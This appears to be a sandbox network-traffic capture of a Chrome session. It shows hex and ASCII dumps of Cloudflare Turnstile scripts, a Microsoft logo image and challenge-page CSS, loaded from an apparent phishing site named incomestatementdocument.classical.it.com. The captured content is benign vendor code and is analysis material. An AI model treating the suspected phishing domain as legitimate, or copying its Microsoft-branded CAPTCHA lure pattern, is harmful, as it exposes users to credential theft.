                                                                                        2025-03-20 17:46:37 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 6f 74 28 65 2c 74 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 49 65 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 7a 74 28 65 29 7c 7c 42 74 28 65 2c 74 29 7c 7c 58 74 28 65 2c 74 29 7c 7c 47 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 50 65 28 65 2c 74 29 7b 76 61 72 20 61 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6c 5b 30
                                                                                        Data Ascii: ray$/.test(a))return ot(e,t)}}function Ie(e,t){return zt(e)||Bt(e,t)||Xt(e,t)||Gt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Pe(e,t){var a={label:0,sent:function(){if(l[0
                                                                                        2025-03-20 17:46:37 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 51 74 3d 33 30 30 30 32 30 3b 76 61 72 20 57 65 3d 33 30 30 30 33 30 3b 76 61 72 20 55 65 3d 33 30 30 30 33 31 3b 76 61 72 20 71 3b 28 66 75
                                                                                        Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Qt=300020;var We=300030;var Ue=300031;var q;(fu
                                                                                        2025-03-20 17:46:37 UTC1369INData Raw: 61 6e 75 61 6c 22 2c 65 2e 41 75 74 6f 3d 22 61 75 74 6f 22 7d 29 28 5a 7c 7c 28 5a 3d 7b 7d 29 29 3b 76 61 72 20 63 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 65 76 65 72 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 61 6e 75 61 6c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 75 74 6f 3d 22 61 75 74 6f 22 7d 29 28 63 65 7c 7c 28 63 65 3d 7b 7d 29 29 3b 76 61 72 20 51 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 6c 77 61 79 73 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 78 65 63 75 74 65 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 6e 74 65 72 61 63 74 69 6f 6e 4f 6e 6c 79 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 51 7c 7c 28 51 3d 7b 7d 29 29 3b 76 61 72 20 6d 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 52 65 6e 64 65 72 3d 22 72
                                                                                        Data Ascii: anual",e.Auto="auto"})(Z||(Z={}));var ce;(function(e){e.Never="never",e.Manual="manual",e.Auto="auto"})(ce||(ce={}));var Q;(function(e){e.Always="always",e.Execute="execute",e.InteractionOnly="interaction-only"})(Q||(Q={}));var me;(function(e){e.Render="r
                                                                                        2025-03-20 17:46:37 UTC1369INData Raw: 74 69 6f 6e 20 70 74 28 65 29 7b 72 65 74 75 72 6e 20 4c 28 5b 4d 2e 4e 6f 72 6d 61 6c 2c 4d 2e 43 6f 6d 70 61 63 74 2c 4d 2e 49 6e 76 69 73 69 62 6c 65 2c 4d 2e 46 6c 65 78 69 62 6c 65 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 76 74 28 65 29 7b 72 65 74 75 72 6e 20 4c 28 5b 22 61 75 74 6f 22 2c 22 6d 61 6e 75 61 6c 22 2c 22 6e 65 76 65 72 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 6d 74 28 65 29 7b 72 65 74 75 72 6e 20 4c 28 5b 22 61 75 74 6f 22 2c 22 6d 61 6e 75 61 6c 22 2c 22 6e 65 76 65 72 22 5d 2c 65 29 7d 76 61 72 20 4e 72 3d 2f 5e 5b 61 2d 7a 5d 7b 32 2c 33 7d 28 5b 2d 5f 5d 5b 61 2d 7a 5d 7b 32 7d 29 3f 24 2f 69 3b 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 72 65 74 75 72 6e 20 65 3d 3d 3d 22 61 75 74 6f 22 7c 7c 4e 72 2e 74 65 73 74 28 65 29
                                                                                        Data Ascii: tion pt(e){return L([M.Normal,M.Compact,M.Invisible,M.Flexible],e)}function vt(e){return L(["auto","manual","never"],e)}function mt(e){return L(["auto","manual","never"],e)}var Nr=/^[a-z]{2,3}([-_][a-z]{2})?$/i;function gt(e){return e==="auto"||Nr.test(e)
                                                                                        2025-03-20 17:46:37 UTC1369INData Raw: 22 72 6f 2d 72 6f 22 5d 3b 66 75 6e 63 74 69 6f 6e 20 54 74 28 65 2c 74 29 7b 76 61 72 20 61 3d 22 68 74 74 70 73 3a 2f 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 22 3b 69 66 28 74 29 7b 76 61 72 20 6f 3b 61 3d 28 6f 3d 65 5b 22 62 61 73 65 2d 75 72 6c 22 5d 29 21 3d 3d 6e 75 6c 6c 26 26 6f 21 3d 3d 76 6f 69 64 20 30 3f 6f 3a 61 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 65 2c 74 2c 61 2c 6f 2c 63 2c 6c 2c 76 2c 68 29 7b 76 61 72 20 73 3d 54 74 28 61 2c 63 29 2c 70 3d 6c 3f 22 68 2f 22 2e 63 6f 6e 63 61 74 28 6c 2c 22 2f 22 29 3a 22 22 2c 5f 3d 68 3f 22 3f 22 2e 63 6f 6e 63 61 74 28 68 29 3a 22 22 2c 41 3d 61 5b 22 66 65 65 64 62 61 63 6b 2d 65 6e 61 62 6c 65 64 22 5d 3d 3d 3d 21 31 3f 22 66 62 44
                                                                                        Data Ascii: "ro-ro"];function Tt(e,t){var a="https://challenges.cloudflare.com";if(t){var o;a=(o=e["base-url"])!==null&&o!==void 0?o:a}return a}function Rt(e,t,a,o,c,l,v,h){var s=Tt(a,c),p=l?"h/".concat(l,"/"):"",_=h?"?".concat(h):"",A=a["feedback-enabled"]===!1?"fbD
                                                                                        2025-03-20 17:46:37 UTC1369INData Raw: 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 7c 7c 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 72 65 74 75 72 6e 20 6f 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 63 2c 6f 7d 2c 65 65 28 65 2c 74 29 7d 66 75 6e 63 74 69 6f 6e 20 75 72 28 65 2c 74 29 7b 69 66 28 74 79 70 65 6f 66 20 74 21 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 74 21 3d 3d 6e 75 6c 6c 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 53 75 70 65 72 20 65 78 70 72 65 73 73 69 6f 6e 20 6d 75 73 74 20 65 69 74 68 65 72 20 62 65 20 6e 75 6c 6c 20 6f 72 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 3b 65 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 77 72 69 74
                                                                                        Data Ascii: .setPrototypeOf||function(o,c){return o.__proto__=c,o},ee(e,t)}function ur(e,t){if(typeof t!="function"&&t!==null)throw new TypeError("Super expression must either be null or a function");e.prototype=Object.create(t&&t.prototype,{constructor:{value:e,writ
                                                                                        2025-03-20 17:46:37 UTC1369INData Raw: 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 65 65 28 63 2c 6f 29 7d 2c 47 65 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 73 72 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 26 26 28 46 28 74 29 3d 3d 3d 22 6f 62 6a 65 63 74 22 7c 7c 74 79 70 65 6f 66 20 74 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 3f 74 3a 7a 65 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 64 72 28 65 29 7b 76 61 72 20 74 3d 42 65 28 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6f 3d 6c 65 28 65 29 2c 63 3b 69 66 28 74 29 7b 76 61 72 20 6c 3d 6c 65 28 74 68 69 73 29 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3b 63 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 6f 2c 61 72 67 75 6d 65 6e 74 73 2c 6c 29 7d 65 6c 73 65 20 63 3d 6f 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72
                                                                                        Data Ascii: nfigurable:!0}}),ee(c,o)},Ge(e)}function sr(e,t){return t&&(F(t)==="object"||typeof t=="function")?t:ze(e)}function dr(e){var t=Be();return function(){var o=le(e),c;if(t){var l=le(this).constructor;c=Reflect.construct(o,arguments,l)}else c=o.apply(this,ar
                                                                                        2025-03-20 17:46:37 UTC1369INData Raw: 74 69 6f 6e 28 65 2c 74 2c 61 29 7b 76 61 72 20 6f 3d 54 74 28 74 2e 70 61 72 61 6d 73 2c 21 31 29 2c 63 3d 22 68 2f 22 2e 63 6f 6e 63 61 74 28 22 62 22 2c 22 2f 22 29 2c 6c 2c 76 2c 68 3d 22 22 2e 63 6f 6e 63 61 74 28 6f 2c 22 2f 63 64 6e 2d 63 67 69 2f 63 68 61 6c 6c 65 6e 67 65 2d 70 6c 61 74 66 6f 72 6d 2f 22 29 2e 63 6f 6e 63 61 74 28 63 2c 22 66 65 65 64 62 61 63 6b 2d 72 65 70 6f 72 74 73 2f 22 29 2e 63 6f 6e 63 61 74 28 58 65 28 65 29 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 74 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 28 76 3d 74 2e 70 61 72 61 6d 73 2e 74 68 65 6d 65 29 21 3d 3d 6e 75 6c 6c 26 26 76 21 3d 3d 76 6f 69 64 20 30 3f 76 3a 74 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 61 29 3b
                                                                                        Data Ascii: tion(e,t,a){var o=Tt(t.params,!1),c="h/".concat("b","/"),l,v,h="".concat(o,"/cdn-cgi/challenge-platform/").concat(c,"feedback-reports/").concat(Xe(e),"/").concat(t.displayLanguage,"/").concat((v=t.params.theme)!==null&&v!==void 0?v:t.theme,"/").concat(a);


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        12192.168.2.1649725104.21.92.584436436C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-03-20 17:46:37 UTC419OUTGET /logos/assets/PNG/Microsoft_Logo_512px.png HTTP/1.1
                                                                                        Host: mailmeteor.com
                                                                                        Connection: keep-alive
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Sec-Fetch-Storage-Access: active
                                                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2025-03-20 17:46:37 UTC894INHTTP/1.1 200 OK
                                                                                        Date: Thu, 20 Mar 2025 17:46:37 GMT
                                                                                        Content-Type: image/png
                                                                                        Content-Length: 2309
                                                                                        Connection: close
                                                                                        Server: cloudflare
                                                                                        Accept-Ranges: bytes
                                                                                        Age: 3230
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Cache-Control: public, max-age=14400, must-revalidate
                                                                                        Etag: "fd1dd9eb8405629af71bda9e0fc8400c"
                                                                                        Content-Security-Policy: frame-ancestors 'self' *.mailmeteor.com
                                                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-Xss-Protection: 1; mode=block
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P5rG6VBQ7RWuHPtXrNyaOLw4zuB6s59ONBR%2Bu5Y5bPBQJAkfNWvbCiwVprVsKC8QVzC18k%2BV52qslywb%2BwcBTqUEXL0Vrw%2FZaQZiCrM4MmXdUiCIbbyanCZ%2BmrC81%2BjufQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Vary: Accept-Encoding
                                                                                        Cf-Cache-Status: HIT
                                                                                        CF-RAY: 923707b18ef642f4-EWR
                                                                                        2025-03-20 17:46:37 UTC475INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 06 00 00 00 f4 78 d4 fa 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 08 9a 49 44 41 54 78 01 ed d6 31 aa 5d 55 14 80 e1 b5 1f 8f 60 23 64 08 b7 b1 cf 10 14 c1 5e b0 b1 74 08 4e c0 c2 09 38 04 3b 3b b1 17 41 87 10 db 54 37 33 78 45 8a 40 20 3b 37 90 22 03 c8 39 24 f9 bf af d9 dd ea d6 5e ff 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7c aa d6 1c e8 c5 0f 5f fd b6 f7 3c 19 e0 44 eb e1 cb 3f 9f 7d 3f 07 f8 f5 9f 47 bf df e6 5f 06 38 cf 7a fd f4 97 6f 5f fd 3c 1f d8 fd 1c e8 dd f1 ff 7a 80
                                                                                        Data Ascii: PNGIHDRxpHYssRGBgAMAaIDATx1]U`#d^tN8;;AT73xE@ ;7"9$^|_<D?}?G_8zo_<z
                                                                                        2025-03-20 17:46:37 UTC1369INData Raw: 00 04 09 00 00 08 12 00 00 10 24 00 00 20 48 00 00 40 90 00 00 80 20 01 00 00 41 02 00 00 82 04 00 00 04 09 00 00 08 12 00 00 10 24 00 00 20 48 00 00 40 90 00 00 80 20 01 00 00 41 02 00 00 82 04 00 00 04 09 00 00 08 12 00 00 10 24 00 00 20 48 00 00 40 90 00 00 80 20 01 00 00 41 02 00 00 82 04 00 00 04 09 00 00 08 12 00 00 10 24 00 00 20 48 00 00 40 90 00 00 80 20 01 00 00 41 02 00 00 82 04 00 00 04 09 00 00 08 12 00 00 10 24 00 00 20 48 00 00 40 90 00 00 80 20 01 00 00 41 02 00 00 82 04 00 00 04 09 00 00 08 12 00 00 10 24 00 00 20 48 00 00 40 90 00 00 80 20 01 00 00 41 02 00 00 82 04 00 00 04 09 00 00 08 12 00 00 10 24 00 00 20 48 00 00 40 90 00 00 80 20 01 00 00 41 02 00 00 82 04 00 00 04 09 00 00 08 12 00 00 10 24 00 00 20 48 00 00 40 90 00 00 80 20 01
                                                                                        Data Ascii: $ H@ A$ H@ A$ H@ A$ H@ A$ H@ A$ H@ A$ H@ A$ H@
                                                                                        2025-03-20 17:46:37 UTC465INData Raw: 40 90 00 00 80 20 01 00 00 41 02 00 00 82 04 00 00 04 09 00 00 08 12 00 00 10 24 00 00 20 48 00 00 40 90 00 00 80 20 01 00 00 41 02 00 00 82 04 00 00 04 09 00 00 08 12 00 00 10 24 00 00 20 48 00 00 40 90 00 00 80 20 01 00 00 41 02 00 00 82 04 00 00 04 09 00 00 08 12 00 00 10 24 00 00 20 48 00 00 40 90 00 00 80 20 01 00 00 41 02 00 00 82 04 00 00 04 09 00 00 08 12 00 00 10 24 00 00 20 48 00 00 40 90 00 00 80 20 01 00 00 41 02 00 00 82 04 00 00 04 09 00 00 08 12 00 00 10 24 00 00 20 48 00 00 40 90 00 00 80 20 01 00 00 41 02 00 00 82 04 00 00 04 09 00 00 08 12 00 00 10 24 00 00 20 48 00 00 40 90 00 00 80 20 01 00 00 41 02 00 00 82 04 00 00 04 09 00 00 08 12 00 00 10 24 00 00 20 48 00 00 40 90 00 00 80 20 01 00 00 41 02 00 00 82 04 00 00 04 09 00 00 08 12 00
                                                                                        Data Ascii: @ A$ H@ A$ H@ A$ H@ A$ H@ A$ H@ A$ H@ A$ H@ A


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        13192.168.2.1649726104.18.95.414436436C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-03-20 17:46:38 UTC865OUTGET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/6kzry/0x4AAAAAABBUE4SschSoV_Hq/auto/fbE/new/normal/auto/ HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Upgrade-Insecure-Requests: 1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                        Sec-Fetch-Site: cross-site
                                                                                        Sec-Fetch-Mode: navigate
                                                                                        Sec-Fetch-Dest: iframe
                                                                                        Sec-Fetch-Storage-Access: active
                                                                                        Referer: https://incomestatementdocument.classical.it.com/
                                                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2025-03-20 17:46:38 UTC1297INHTTP/1.1 200 OK
                                                                                        Date: Thu, 20 Mar 2025 17:46:38 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Content-Length: 28317
                                                                                        Connection: close
                                                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                        permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                        content-security-policy: default-src 'none'; script-src 'nonce-wIVKgsKoTQ8HrSsl' 'unsafe-eval'; script-src-attr 'none'; worker-src blob:; style-src 'unsafe-inline'; img-src 'self'; connect-src 'self'; frame-src 'self' blob:; child-src 'self' blob:; form-action 'none'; base-uri 'self'; sandbox allow-same-origin allow-scripts allow-popups allow-forms
                                                                                        cross-origin-embedder-policy: require-corp
                                                                                        cross-origin-opener-policy: same-origin
                                                                                        cross-origin-resource-policy: cross-origin
                                                                                        origin-agent-cluster: ?1
                                                                                        accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                        2025-03-20 17:46:38 UTC411INData Raw: 63 72 69 74 69 63 61 6c 2d 63 68 3a 20 53 65 63 2d 43 48 2d 55 41 2d 42 69 74 6e 65 73 73 2c 20 53 65 63 2d 43 48 2d 55 41 2d 41 72 63 68 2c 20 53 65 63 2d 43 48 2d 55 41 2d 4d 6f 62 69 6c 65 2c 20 53 65 63 2d 43 48 2d 55 41 2d 4d 6f 64 65 6c 2c 20 53 65 63 2d 43 48 2d 55 41 2d 50 6c 61 74 66 6f 72 6d 2d 56 65 72 73 69 6f 6e 2c 20 53 65 63 2d 43 48 2d 55 41 2d 46 75 6c 6c 2d 56 65 72 73 69 6f 6e 2d 4c 69 73 74 2c 20 53 65 63 2d 43 48 2d 55 41 2d 50 6c 61 74 66 6f 72 6d 2c 20 53 65 63 2d 43 48 2d 55 41 2c 20 55 41 2d 42 69 74 6e 65 73 73 2c 20 55 41 2d 41 72 63 68 2c 20 55 41 2d 46 75 6c 6c 2d 56 65 72 73 69 6f 6e 2c 20 55 41 2d 4d 6f 62 69 6c 65 2c 20 55 41 2d 4d 6f 64 65 6c 2c 20 55 41 2d 50 6c 61 74 66 6f 72 6d 2d 56 65 72 73 69 6f 6e 2c 20 55 41 2d 50
                                                                                        Data Ascii: critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-P
                                                                                        2025-03-20 17:46:38 UTC1030INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 66 61 75 6c 74 2d 73 72 63 20 26 23 78 32 37 3b 6e 6f 6e 65 26 23 78 32 37 3b 3b 20 73 63 72 69 70 74 2d 73 72 63 20 26 23 78 32 37 3b 6e 6f 6e 63 65 2d 77 49 56 4b 67 73 4b 6f 54 51 38 48 72 53 73 6c 26 23 78 32 37 3b 20 26 23 78 32 37 3b 75 6e 73 61 66 65 2d
                                                                                        Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="x-ua-compatible" content="IE=Edge,chrome=1"> <meta http-equiv="content-security-policy" content="default-src &#x27;none&#x27;; script-src &#x27;nonce-wIVKgsKoTQ8HrSsl&#x27; &#x27;unsafe-
                                                                                        2025-03-20 17:46:38 UTC1369INData Raw: 6d 65 73 20 66 69 6c 6c 66 61 69 6c 7b 74 6f 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 69 6e 73 65 74 20 30 20 33 30 70 78 20 30 20 30 20 23 64 65 31 33 30 33 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 69 6c 6c 66 61 69 6c 2d 6f 66 66 6c 61 62 65 6c 7b 74 6f 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 69 6e 73 65 74 20 30 20 30 20 30 20 33 30 70 78 20 23 32 33 32 33 32 33 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 69 6c 6c 66 61 69 6c 2d 6f 66 66 6c 61 62 65 6c 2d 64 61 72 6b 7b 74 6f 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 69 6e 73 65 74 20 30 20 30 20 30 20 33 30 70 78 20 23 66 66 66 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 73 63 61 6c 65 2d 75 70 2d 63 65 6e 74 65 72 7b 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 2e 30 31 29 7d 74 6f 7b 74 72 61 6e 73 66 6f 72
                                                                                        Data Ascii: mes fillfail{to{box-shadow:inset 0 30px 0 0 #de1303}}@keyframes fillfail-offlabel{to{box-shadow:inset 0 0 0 30px #232323}}@keyframes fillfail-offlabel-dark{to{box-shadow:inset 0 0 0 30px #fff}}@keyframes scale-up-center{0%{transform:scale(.01)}to{transfor
                                                                                        2025-03-20 17:46:38 UTC1369INData Raw: 61 6c 69 67 6e 3a 72 69 67 68 74 7d 23 6f 76 65 72 72 75 6e 2d 69 2c 23 73 70 69 6e 6e 65 72 2d 69 7b 61 6e 69 6d 61 74 69 6f 6e 3a 73 70 69 6e 20 35 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 68 65 69 67 68 74 3a 33 30 70 78 3b 77 69 64 74 68 3a 33 30 70 78 7d 23 66 61 69 6c 2d 69 7b 61 6e 69 6d 61 74 69 6f 6e 3a 73 63 61 6c 65 2d 75 70 2d 63 65 6e 74 65 72 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 35 35 2c 2e 30 38 35 2c 2e 36 38 2c 2e 35 33 29 20 62 6f 74 68 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 69 6e 73 65 74 20 30 20 30 20 30 20 23 64 65 31 33 30 33 7d 23 66 61 69 6c 2d 69 2c 23 73 75 63 63 65 73 73 2d 69 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 30 25 3b 64 69 73 70 6c 61 79 3a 66
                                                                                        Data Ascii: align:right}#overrun-i,#spinner-i{animation:spin 5s linear infinite;display:flex;height:30px;width:30px}#fail-i{animation:scale-up-center .6s cubic-bezier(.55,.085,.68,.53) both;box-shadow:inset 0 0 0 #de1303}#fail-i,#success-i{border-radius:50%;display:f
                                                                                        2025-03-20 17:46:38 UTC1369INData Raw: 68 61 64 6f 77 3a 69 6e 73 65 74 20 30 20 30 20 30 20 23 30 61 61 39 33 37 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 3a 23 30 61 61 39 33 37 3b 66 69 6c 6c 3a 23 30 61 61 39 33 37 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 65 78 70 69 72 65 64 2d 63 69 72 63 6c 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 74 69 6d 65 6f 75 74 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 39 39 39 3b 66 69 6c 6c 3a 23 39 39 39 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 65 78 70
                                                                                        Data Ascii: hadow:inset 0 0 0 #0aa937}.theme-dark .success-circle{stroke:#0aa937;fill:#0aa937}.theme-dark .expired-circle,.theme-dark .timeout-circle{stroke-dasharray:166;stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#999;fill:#999}.theme-dark #exp
